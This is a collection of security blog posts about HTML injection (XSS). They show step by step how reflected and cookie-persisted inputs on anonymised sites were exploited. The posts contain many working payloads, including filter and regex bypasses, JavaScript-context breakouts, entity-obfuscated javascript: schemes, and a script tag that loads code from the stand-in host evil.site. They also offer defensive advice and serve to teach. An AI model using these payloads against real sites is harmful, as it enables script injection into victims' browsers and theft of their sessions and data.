Category Archives: html injection

A True XSS That Needs To Be False

SummaLogicae
It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied alert(). Sometimes, parsing an expression takes more effort that breaking it.

So, redirect your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:

https://web.site/UnknownError.aspx?id=”onmouseover=alert(9);a=”

The page reflects the value of this id parameter within an href attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

<a href="mailto:support@web.site?subject=error reference: "onmouseover=alert(9);a="">support@web.site</a>

Yet the browser goes into an infinite redirect loop without ever launching the alert. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the <body> element — well after several other JavaScript functions and page content. It should have been present in the <head>. It’s like the developers knew they should do something about clickjacking, heard about a top.location trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

<script type="text/javascript">
if (window.top.location != 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="') {
    window.top.location.href = 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="';
}
</script>

The URL in your browser bar may look exactly like the URL in the inequality test. However, the location.href property contains the URL-encoded (a.k.a. percent encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new location.href. As such, the following two strings are not identical:

https://web.site/UnknownError.aspx?id=%22onmouseover=alert(9);a=%22
https://web.site/UnknownError.aspx?id=”onmouseover=alert(9);a=”

Since the anti-framing triggers before the browser encounters the affected href, the onmouseover payload (or any other payload inserted in the tag) won’t trigger.

This isn’t a problem. Just redirect your onhack event from the href to the if statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. It makes the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the alert() and a Boolean operator to force a false outcome.

The new payload is

'+alert(9)&&null=='

Which results in this:

<script type="text/javascript">
if (window.top.location != 'https://web.site/UnknownError.aspx?id='+alert(9)&&null=='') {
    window.top.location.href = 'https://web.site/UnknownError.aspx?id='+alert(9)&&null=='';
}
</script>

Note that we could have used other operators to glue the alert() to its preceding string. Any arithmetic operator would have worked.

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:

undefined==''
[]!=''
[]===''

This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with execution different contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. <script>) after the href, but the if statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page — URL encoding would have been a logical step.

A Hidden Benefit of HTML5

Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this task, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that works around validation filters and avoids being defeated by output encoding schemes. Sometimes it’s necessary to wander the dusty passages of parsing rules in search of a hidden door that opens an element to being exploited.

HiddenShrineOfTamoachan

HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

And every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of an hidden input field. In the following example, note that the quotation mark has not been filtered or encoded.

http://web.site/search?sortOn=x”

<input type="hidden" name="sortOn" value="x"">

If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless.

http://web.site/search?sortOn=x”><script>alert(9)</script><z”

<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">

Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">

Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">

The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">

But modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, 8.1.2.3 Attributes:

“There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.”

Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems; it’s to be avoided at all costs.

From the spec, 8.2.4.35 Attribute name state

“When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

So, we’ll never be able to fool a browser by “casting” the input field to a different type by a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines parsing rules in HTML Living Standard section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >

HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection, but the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as
the absence of unmitigatable surprise“. Look for flaws in modern browsers where this trick works, (e.g. maybe a compatibility mode or not using an explicit <!doctype html> weakens the browser’s parsing algorithm). With luck, most of the problems you discover will be implementation errors to be fixed in a particular browser rather than a design change required of the spec.

HTML5 gives us a better design to help minimize parsing-based security problems. It’s up to web developers to design better sites to help maximize the security of our data.

The Wrong Location for a Locale

Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encoding like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)Namárië

A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment — which doesn’t make a round trip to the web site — isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

http://web.site/page.do?locale=en_US

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

http://web.site/page.do?locale=en_US%22%3E%3Cscript%3Ealert%289%29%3C/script%3E

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%3Ealert(9)%3C/script%3E%0A%0D

The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body> :

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&# 034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

">

And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&# 034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

"></span>

And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example, we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script>alert(9)</script>

" xml:lang="en-US">

<script>alert(9)</script>

">
<head>

And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!--  Include the Reference Page Tag script -->
<!--//BEGIN REFERENCE PAGE TAG SCRIPT-->
<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US"&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

';
</script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

http://web.site/page.do?locale=en_US”>%0A%0D’;alert(9)//

Too bad the apostrophe character (‘) remains encoded:

<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US&# 034;&gt;

&# 039;;alert(9)//';
</script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%20src=%22http://evil.site/%22%3E%3C/script%3E%0A%0D

As expected, the page.do’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&# 034;&gt;

&lt;script src=&# 034;http://evil.site/&# 034;&gt;&lt;/script&gt;

">

But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by evil.site.

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script src="http://evil.site/"></script>

" xml:lang="en-US">

<script src="http://evil.site/"></script>

">
<head>

Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload — it’s just

http://web.site/contactUs.do

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A;
        JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
        sessionLocale="en_US\">  <script src=\"http://evil.site/\"></script>  ";
        exScreenRes=done

Sometime between the request to page.do and the contact page the site decided to take the locale parameter from page.do and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale. The locale isn’t as picturesque as Hogwarts, nor as destitute as District 12, but Hermione and Katniss would rip apart a vuln like this.Hermione's Exam Schedule

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert:

http://web.site/page.aspx?om=alert(9)

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And — spoiler alert — not in the following script block:

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop4="quote";
s.events="event2";
s.pageName="quote1";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site. Just visiting them as any user might without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

http://web.site/wacky/archives/2012/cute_animal.aspx

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17="alert(9)";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!).

http://web.site/page.aspx?om=”%2balert(9)%2b”

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click to Show Page Source we’re greeted with that happy hacker greeting, the friendly alert() window.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17=""+alert(9)+"";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page) we narrow the persistent carrier to a cookie value. The cookie is a long string of hexadecimal digits whose length and content does not change between requests. This is a good hint that it’s some sort of UUID that points to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.

So, we have a persistent HTML injection tied to a user-tracking cookie. A diminishing factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice it we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Implicit HTML, Explicit Injection

When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.

It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when it encounters unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.

One of HTML5′s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies — giving us a world where sites worked well with one and only one version of Internet Explorer (or Mozilla, etc.). A great deal of blame lays at the feet of site developers who refused to consider good HTML design patterns in favor of the principle of Code Relying on Advanced Persistent Stubbornness.

Parsing Disharmony

Untidy markup is a security hazard. It makes HTML injection vulnerabilities more difficult to detect and block, especially for regex-based countermeasures.

Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on anything other than a narrowly-focused regex becomes unwieldy at best.

First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the img tag:

<img/alt=""src="."onerror=alert(9)>

Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering strange parsing territory. For some sites, this will be a trip to the undiscovered country.

Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The id attribute has an unquoted value, so we separate it from the subsequent attribute with a space. The href has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we put onclick immediately after.

<a""id=a href=""onclick=alert(9)>foo</a>

User-Agents try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:

<script/<a>alert(9)</script> 

We can adjust the end tag if there’s a filter watching for </script>. Note there is a space between the last </script and </a>.

<script/<a>alert(9)</script </a>

Successful HTML injection thrives on bad mark-up to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s %0d%0a into \r\n (carriage return, line feed) when it places the payload into HTML, then the browser might execute the alert function.

<script%0d%0aalert(9)</script>

Or you might be able to separate the lack of closing > character from the alert function with an intermediate HTML comment:

<script%20<!--%20-->alert(9)</script>

The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a javascript: scheme with a line feed.

<div id=mycode style="BACKGROUND: url('java 
script:eval(document.all.mycode.expr)')" expr="alert(9)"></div>

Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.

<a href=""&amp;/onclick=alert(9)>foo</a>

HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three JavaScript schemes use an entity for the “s” character:

java&#115;cript:alert(9)
java&#x73;cript:alert(9)
java&#x0073;cript:alert(9)

The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.

Security

User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.

  • Fix the vulnerability, not the exploit.
    It’s not uncommon for developers to blacklist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
  • Test with multiple browsers.
    A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
  • Prefer parsing to regex patterns.
    Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
  • Encode characters.
    You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like < and > and prevent quotes from breaking attribute values.
  • Enforce rules strictly.
    Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.

HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, by not so myopic that they miss “improper” HTML constructs that a browser will happily render.

Know Your JavaScript (Injections)

HTML injection vulnerabilities make a great Voigt-Kampff test for proving you care about security. We need some kind of tool to deal with developers who take refuge in the excuse, “But it’s not exploitable.”

Companies like MasterCard and VISA created the PCI standard to make sure web sites care about vulns like XSS. Parts of the standard are pretty strict, to the point where a site faces fines or becomes unable to process credit cards if it fails to fix vulns quickly. This also means that every once in a while a site’s developers refuse to acknowledge a vuln is valid because they don’t see an alert() pop up.

The poor dears.

(1) Probe for Reflected Values

Let’s examine Exhibit One: A Means of Writing Arbitrary Mark-up into a Page. In this case, the URL parameter’s value is written into a JavaScript string variable called pageUrl. HTML injection doesn’t get much easier than this.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27

The code now has an extra apostrophe hanging out at the end of pageUrl:

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

But when the devs go to check the vuln, they show that it’s not possible to issue an alert(). For example, they update the payload with something like this:

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;alert(9)//

None of the variations on the payload seem to work. They terminated the string properly. The value gets reflected. But nothing results in JavaScript execution.

(2) Break Out of One Context, Break Another

It’s too bad our developers didn’t take the time to, you know, debug the problem. After all, HTML injection attacks are a coding exercise like any other. (Although perhaps a bit more fun.)

For starters, our payload is reflected inside a JavaScript function scope. Maybe the SetLanCookie() function just isn’t being called within the page? That would explain why the alert() never runs. A reasonable step is to close the function with a curly brace and dangle a naked alert() within the script block.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=%27

The following code confirms that the site still reflects the payload. However, our browser still isn’t visited by the expected pop-up.

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'}alert(9);var a='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

But browsers have Developer Consoles and Error Consoles that print friendly messages about their activity. Taking a peek at the console output reveals why we haven’t yet succeeded in tossing up the alert() box. The script block still contains syntax errors. And unhappy syntax makes an unhappy hacker. (And a lazy one.)

[14:36:45.923] SyntaxError: function statement requires a name @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);function(){var%20a=%27  SomePage.aspx:345

[14:42:09.681] SyntaxError: syntax error @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;}()alert(9);function(){var%20a=%27  SomePage.aspx:345

(3) Capture the Function Body

When we remember to terminate the JavaScript string, we must also remember to capture the syntax that follows the payload. In some cases, you can get away with escaping it with // characters. If you look at the previous code, you’ll notice that we also tried to re-capture the remainder of the string with ;var a =' inside the payload.

What needs to be done is re-capture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to fix this attack, just update the payload with an opening function statement, as below:

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;function%28%29{var%20a=%27

The page reflects the payload once again, as shown in the following code. Spaces and carriage returns have been added to make the example easier to read. They’re unnecessary in the wild (you can minify XSS payloads, too).

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'
}
alert(9);
function(){
  var a='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

Almost there. But the pop-up remains elusive.

(4) Var Your Function

Oops. We created a function, but forgot to name it. Normally, JavaScript doesn’t care about explicit names, but it at least needs a scope for unnamed, anonymous functions. For example, the following syntax creates and executes an anonymous function that generates an alert:

(function(){alert(9)})()

We don’t need to be that fancy, but it’s nice to remember our options. In this case, we’ll assign the function to another var. Happy syntax is executing syntax. And executing syntax kills a site’s security.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=function%28%29{var%20a=%27

Finally, we reach a point where the payload inserts an alert() and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.) Behold the fully exploited page, with spaces added for clarity:

function SetLanCookie() {
  var index = document.getElementById('selectorControl').selectedIndex;
  var lcname = document.getElementById('selectorControl').options[index].value;
  var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'
}
alert(9);
var a = function(){
  var a ='';
  if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
    var hflanguage = document.getElementById(getClientId().HfLanguage);
    hflanguage.value =  '1';
  }
  $.cookie('LanCookie', lcname, {path: '/'});
  __doPostBack('__Page_btnLanguageLink','')
}

What do you dream of? A world without HTML injection? Electric Sheep?

I wish we could have gotten rid of XSS and SQL injection long ago. I’ve written articles lamenting them. Published books about understanding them. Created scanners to find them. Yet those efforts come and go. All those moments will be lost in time, like tears in rain.

A Lesser XSS Attack Greater Than Your Regex Security

I know what you’re thinking. “Did my regex block six XSS attacks or five?” You’ve got to ask yourself one question: “Do I feel lucky?” Well, do ya, punk?

Maybe you read a few HTML injection (cross-site scripting) tutorials and think a regex solves this problem. Maybe. Let’s revisit that thinking. We’ll need an attack vector. It could be a URL parameter, form field, header, or any other part of an HTTP request.

Choose an Attack Vector

Many web apps implement a search functionality. That’s an ideal attack vector because the nature of a search box is to accept an arbitrary string, then display the search term along with any relevant results. It’s the display, or reflection, of the search term that often leads to HTML injection.

For example, the following screenshot shows how Google reflects the search term “html injection attack” at the bottom of its results page. And the text node created in the HTML source.

Google search boxGoogle searchGoogle search html source

Here’s another example that shows how Twitter reflects the search term “deadliestwebattacks” in its results page. And the text node created in the HTML source.

Twitter searchTwitter search html source

Let’s take a look at another site with a search box. Don’t worry about the text (it’s a Turkish site, the words are basically “search” and “results”). First, we try a search term, “foo”, to check if the site echoes the term into the response’s HTML. Success! It appears in two places: a title attribute and a text node.

<a title="foo için Arama Sonuçları">Arama Sonuçları : "foo"</a>

Next, we probe the page for tell-tale validation and output encoding weaknesses that indicate the potential for this vulnerability to be present. In this case, we’ll try a fake HTML tag, “<foo/>”.

<a title="<foo/> için Arama Sonuçları">Arama Sonuçları : "<foo/>"</a>

The site inserts the tag directly into the response. The <foo/> tag is meaningless for HTML, but the browser recognizes that it has the correct mark-up for a self-enclosed tag. Looking at the rendered version displayed by the browser confirms this:

Arama Sonuçları : ""

The “<foo/>” term isn’t displayed because the browser interprets it as a tag. It creates a DOM node of <foo> as opposed to placing a literal “<foo/>” into the text node between <a> and </a>.

Inject a Payload

The next step is to find a tag with semantic meaning for a browser. An obvious choice is to try “<script>” as a search term since that’s the containing element for JavaScript.

<a title="<[removed]> için Arama Sonuçları">Arama Sonuçları : "<[removed]>"</a>

The site’s developers seem to be aware of the risk of writing raw “<script>” elements into search results. In the title attribute, they replaced the angle brackets with HTML entities and replaced “script”  with “[removed]“.

A good hacker would continue to probe the search box with different kinds of payloads. Since it seems impossible to execute JavaScript within a <script> element, we’ll try JavaScript execution within the context of an element’s event handler.

Try Alternate Payloads

Here’s a payload that uses the onerror attribute of an <img> element to execute a function:

<img src="x" onerror="alert(9)">

We inject the new payload and inspect the page’s response. We’ve completely lost the attributes, but the element was preserved:

<a title="<img> için Arama Sonuçları">Arama Sonuçları : "<img>"</a>

So, let’s modify out payload a bit. We condense it to a format that remains valid (i.e. a browser interprets it and it doesn’t violate the HTML spec). This step just demonstrates an alternate syntax with the same semantic meaning.

<img/src="x"onerror=alert(9)>

HTML injection payload

Unfortunately, the site stripped the onerror function the same way it did for the <script> tag.

<a title="<img/src="x"on[removed]=alert(9)>">Arama Sonuçları : "<img/src="x"on[removed]=alert(9)>"</a>

Additional testing indicates the site apparently does this for any of the onfoo event handlers.

Refine the Payload

We’re not defeated yet. The fact that the site is looking for malicious content implies that it’s relying on regular expressions to blacklist common attacks.

Oh, how I love regexes. I love writing them, optimizing them, and breaking them. Regexes excel at pattern matching, but fail miserably at parsing. And parsing is fundamental to working with HTML.

So, let’s unleash a mighty anti-regex hack. I’d call for a drum roll to build the suspense, but the technique is too trivial for that. All we do is add a greater than (>) symbol:

<img/src="x>"onerror=alert(9)>

HTML injection payload with anti-regex

Look what happens to the site. We’ve successfully injected an <img> tag. The browser parses the element, but it fails to load the image called “x>” so it triggers the error handler, which pops up a friendly alert.

<a title="<img/src=">"onerror=alert(9)> için Arama Sonuçları">Arama Sonuçları : "<img/src="x>"onerror=alert(9)>"</a>

alert(9)

Why does this happen? I don’t have first-hand knowledge of the specific regex, but I can guess at its intention.

